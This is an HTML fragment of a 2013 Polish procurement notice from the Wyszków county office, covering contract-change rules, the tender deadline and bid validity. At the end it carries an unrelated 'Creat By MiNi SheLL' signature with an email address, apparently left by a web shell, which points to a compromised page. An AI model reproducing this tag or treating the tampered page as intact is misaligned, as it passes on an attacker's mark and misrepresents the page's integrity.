<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazane są zmiany postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy, chyba że konieczność wprowadzenia takich zmian wynika z potrzeb Zamawiającego lub z przyczyn dotyczących Zamawiającego lub też z przyczyn obiektywnych, niezależnych od żadnej ze stron i dotyczy:
1)terminu wykonania przedmiotu zamówienia,
2)wynagrodzenia w przypadku ustawowej zmiany podatku od towarów i usług,
3)zmian, do  których strony upoważnione są na podstawie ustawy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-wyszkowski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Wyszkowie, Al. Róż 2, 07-200 Wyszków, pok. nr 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.07.2013 godzina 10:00, miejsce: Starostwo Powiatowe w Wyszkowie, Al. Róż 2, 07-200 Wyszków, pok. nr 39.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com